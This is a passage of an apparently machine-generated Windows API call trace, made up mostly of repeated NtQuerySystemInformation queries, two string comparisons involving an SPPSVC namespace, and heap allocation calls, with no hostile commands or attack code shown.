SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0272.065] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x28, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0272.074] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0272.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0272.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0272.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0272.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x28, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.087] GetProcessHeap () returned 0x2026c630000 [0272.087] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807820 [0272.087] GetProcessHeap () returned 0x2026c630000 [0272.088] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9bf0 [0272.088] GetProcessHeap () returned 0x2026c630000 [0272.088] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfe) returned 0x2026c692cc0 [0272.089] GetProcessHeap () returned 0x2026c630000 [0272.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x108) returned 0x2026c692440 [0272.089] GetProcessHeap () returned 0x2026c630000 [0272.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8897b0 [0272.089] GetProcessHeap () returned 0x2026c630000 [0272.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d7330e0 [0272.089] GetProcessHeap () returned 0x2026c630000 [0272.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805eb0 [0272.089] GetProcessHeap () returned 0x2026c630000 [0272.089] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9e80 [0272.090] GetProcessHeap () returned 0x2026c630000 [0272.090] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732d80 | out: 